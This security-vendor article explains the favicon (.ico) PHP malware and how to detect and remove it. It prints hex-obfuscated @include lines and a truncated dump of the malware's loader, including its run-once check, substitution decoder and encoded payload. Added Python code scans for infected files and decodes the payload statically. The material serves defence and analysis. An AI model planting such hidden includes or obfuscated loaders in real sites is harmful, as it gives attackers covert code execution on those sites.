What is the Favicon (.ico) Malware hack?


The favicon (.ico) malware creates a rogue favicon.ico or randomly named .ico files that contain malicious PHP code. This PHP code is known to perform dangerous actions on the website, such as URL injection, creation of administrator accounts in WordPress/Drupal, installation of spyware/trojans, creation of phishing pages, etc.

The Favicon/Bak.Bak malware creates a malicious favicon.ico file or random files ending with the .ico extension, polluting your server with spam files. These files contain malicious code instead of the genuine icon image data.


Malicious code is added to index.php and other PHP files, which then 'include' the .ico file so that the PHP code hidden inside it is executed.

This article also includes steps to help you with the favicon (.ico) hack removal.

Files targeted in this attack

  • index.php
  • wp-login.php

How to detect the Favicon Virus?

  • Scan your website for all icon (.ico) files.
  • Download all these .ico files to your system and rename their file extensions to ".txt".
  • Open the .ico files, now converted to .txt, and look for PHP code; if any PHP code is found, the file is most probably infected.
  • Now scan your core files for instances where the malicious PHP code found in the above step is included and executed.
  • If the file contains only gibberish (the binary image data, as shown in the screenshot below), then the file is not infected.

Following the above steps will help you with favicon (.ico) hack removal.

Malware examples

Malware flagged in index.php by Astra's malware scanner

Files infected with malware, flagged by Astra's malware scanner

  • @include "\x2fhome\x2fid00\x3131/d\x6fmain\x73/wid\x65-ope\x6e-net\x77orks\x2ecom/\x70ubli\x63_htm\x6c/mod\x75les/\x63olor\x2ffavi\x63on_6\x61ecc7\x2eico";
  • /home/username/public_html/modules/color/favicon_6aecc7.ico
  • @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico";
  • @include "\x2f/s\x67b/\x66av\x69co\x6e_5\x34e6\x65d.\x69co";
  • @include "\x2f/\x73g\x62/\x66a\x76i\x63o\x6e_\x354\x656\x65d\x2ei\x63o";
  • @include "\x2f/\x70o\x6c-\x6de\x74/\x5fh\x74m\x6c/\x76i\x65w\x2ff\x61v\x69c\x6fn\x5f3\x30a\x391\x65.\x69c\x6f";
  • @include "\x2f/sg\x62/fa\x76ico\x6e_54\x656ed\x2eico";
  • @include "\x2f/p\x6fl-\x6det\x2f_h\x74ml\x2fvi\x65w/\x66av\x69co\x6e_3\x30a9\x31e.\x69co";
  • @include "\x2f/po\x6c-me\x74/_h\x74ml/\x76iew\x2ffav\x69con\x5f30a\x391e.\x69co";
  • @include "\x2f/pol\x2dmet/\x5fhtml\x2fview\x2ffavi\x63on_3\x30a91e\x2eico";
  • @include "\x2fmnt\x2ftar\x67et0\x33/35\x36076\x2f363\x3244/\x77ww.\x63red\x69tfa\x69ry.\x75s/w\x65b/c\x6fnte\x6et/w\x70-co\x6eten\x74/wf\x6cogs\x2ffav\x69con\x5fce8\x64b6.\x69co";
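The detection steps above (check every .ico file for PHP, then find the PHP files that include it) and the hex-escaped @include lines listed here can be automated. The following is an added example, not code from the original article or from Astra; the sample files it writes to a temporary directory are constructed, and the one path it reuses (modules/color/favicon_6aecc7.ico) is taken from the list above.

```python
import os
import re
import tempfile
ICO_MAGIC = b"\x00\x00\x01\x00"  # ICONDIR header that every genuine .ico starts with
PHP_MARKERS = (b"<?php", b"eval(", b"base64_decode", b"ALREADY_RUN_")
# include/require of a double-quoted string, possibly written with \xNN escapes as on this page
INCLUDE_RE = re.compile(rb'@?(?:include|require)(?:_once)?\s*\(?\s*"((?:\\x[0-9a-fA-F]{2}|[^"\\])+)"')

def decode_hex_escapes(s: bytes) -> str:
    """Resolve PHP double-quoted \\xNN escapes so the included path becomes readable."""
    return re.sub(rb"\\x([0-9a-fA-F]{2})", lambda m: bytes([int(m.group(1), 16)]), s).decode("latin-1")

def ico_is_suspicious(data: bytes) -> bool:
    """A real icon begins with the ICONDIR magic and never contains PHP markers."""
    return not data.startswith(ICO_MAGIC) or any(m in data for m in PHP_MARKERS)

def suspicious_includes(php_source: bytes) -> list:
    """Decoded paths of includes that pull in a .ico file, obfuscated or not."""
    paths = [decode_hex_escapes(m.group(1)) for m in INCLUDE_RE.finditer(php_source)]
    return [p for p in paths if p.lower().endswith(".ico")]

def scan_tree(root: str) -> dict:
    report = {"bad_ico": [], "bad_includes": {}}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                data = fh.read()
            if name.lower().endswith(".ico") and ico_is_suspicious(data):
                report["bad_ico"].append(rel)
            elif name.lower().endswith(".php") and suspicious_includes(data):
                report["bad_includes"][rel] = suspicious_includes(data)
    return report

def demo() -> dict:
    """Scan a constructed sample site written to a temp dir (sample data, not real files)."""
    samples = {
        "favicon.ico": ICO_MAGIC + b"\x01\x00" + bytes(16),  # genuine-looking icon
        "modules/color/favicon_6aecc7.ico": b"<?php eval(base64_decode('...')); ?>",
        "index.php": b'<?php\n@include "\\x2f/sgb\\x2ffavi\\x63on_5\\x34e6ed\\x2eico";\n',
        "wp-login.php": b"<?php\nrequire_once 'wp-load.php';\n",  # clean
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in samples.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        return scan_tree(root)
```

Run scan_tree() against the web root instead of demo() to get the list of .ico files that are not real icons and, per PHP file, the decoded paths they include.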

Symptoms & Problems with this malware

  • Rogue Admin User in CMS
  • Installs Spyware
  • Patches xmlrpc.php
  • Spammy files are created

How does the Favicon/Bak.Bak malware work?

  • The malware first checks a semaphore constant with the prefix “ALREADY_RUN_”, so that its payload runs only once, using the following lines of malicious code: if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')){ define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);
  • Thereafter, a randomly named function is declared, in this case "rxjdqbd". It takes a base64-encoded payload and a translation string as its two parameters, replaces each character of the payload according to the translation rules, and decodes the result into code that can be executed.
  • Finally, the malware declares an associative array holding the translation key characters, and the eval function is called to run the decoded malicious script.

How to remove favicon.ico hack

  • Delete the malicious .ico file
  • Remove the malicious code in the index.php & other PHP files which include these malicious files

Learn more about backdoors in WordPress and how to fix them.


How to Remove Favicon/Bak.Bak Malware

If you also find your website behaving erratically, follow these steps to remove the malware:

  • Scan all icon files on your server for PHP code. This can be done using the grep command, which lists every .ico file that contains a PHP open tag: grep -r -l -i --include='*.ico' '<?php' .
  • Make a copy of these files and change their extension from .ico to .txt. So, for example, a file abc.ico would now become abc.txt.
  • Open these text files one by one and look for any PHP code. Delete the infected .ico files.

Code Dump

<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

 $zqhlhv = 1056;
 // Decoder: maps each character of $cdfuc through the lookup table $attkkyxjmu
 // (characters without a mapping pass through unchanged), then rawurldecode()s the result.
 function rxjdqbd($cdfuc, $attkkyxjmu)
 {
     $wfdjzocv = '';
     for ($i = 0; $i < strlen($cdfuc); $i++) {
         $wfdjzocv .= isset($attkkyxjmu[$cdfuc[$i]]) ? $attkkyxjmu[$cdfuc[$i]] : $cdfuc[$i];
     }
     $udaib = "rawurl" . "decode"; // function name split in two to evade simple signature matching
     return $udaib($wfdjzocv);
 }
$yoyqluklu = '%2J%2u%2J%2u%T2606_Cre%nF%nQrNNLN_oLS%nQ%n1%n2qpWW%nP%aD%2J%'.
'2u%T2606_Cre%nF%nQoLS_rNNLNC%nQ%n1%n22%nP%aD%2J%2u%T2606_Cre%nF%nQIxi_rirXK'.
'e6L0_e6Ir%nQ%n1%n22%nP%aD%2J%2u%T2rNNLN_NrdLNe60S%nF2%nP%aD%2J%2u%T2Cre_e6Ir'.
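The decoder in the dump above, ported to Python so a responder can unpack the $yoyqluklu payload statically instead of letting eval() run it. This is an added example, not code from the article or from the malware; because the dump is truncated, SAMPLE_TABLE is a constructed substitution table standing in for the real associative array, and obfuscate() exists only to build a labelled sample payload for the round trip.

```python
import re
from urllib.parse import unquote

# Constructed substitution table standing in for the truncated array in the dump:
# cover characters on the left, the hex digit each one stands for on the right.
SAMPLE_TABLE = dict(zip("JuTnQPCWpqDFaSLN", "0123456789abcdef"))

def rxjdqbd(encoded: str, table: dict) -> str:
    """Port of the malware's decoder: map every character through the table
    (unmapped characters such as '%' pass through) and rawurldecode() the result."""
    translated = "".join(table.get(ch, ch) for ch in encoded)
    return unquote(translated)  # urllib's unquote behaves like PHP's rawurldecode

def obfuscate(plain: str, table: dict) -> str:
    """Inverse of rxjdqbd, used here only to build a sample payload:
    percent-encode every byte, then swap each hex digit for its cover character."""
    inverse = {digit: cover for cover, digit in table.items()}
    percent_encoded = "".join("%%%02x" % b for b in plain.encode())
    return "".join(inverse.get(ch, ch) for ch in percent_encoded)

def join_literal_chunks(php_src: str, var: str) -> str:
    """Reassemble a string the loader spreads over several '...' . '...' chunks,
    as the dump does for $yoyqluklu, so it can be handed to rxjdqbd()."""
    m = re.search(r"\$" + re.escape(var) + r"\s*=\s*((?:'[^']*'\s*\.?\s*)+);", php_src, re.S)
    if not m:
        raise ValueError(f"${var} not found")
    return "".join(re.findall(r"'([^']*)'", m.group(1)))

def decode_from_dump(php_src: str, var: str, table: dict) -> str:
    """Full static pipeline: pull the chunked literal out of the source, then decode it."""
    return rxjdqbd(join_literal_chunks(php_src, var), table)
```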
This information is provided as part of the Astra community project. All information should be considered as-is, without guarantees. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement. If you are an owner of some content and want it to be removed, please mail to [email protected]
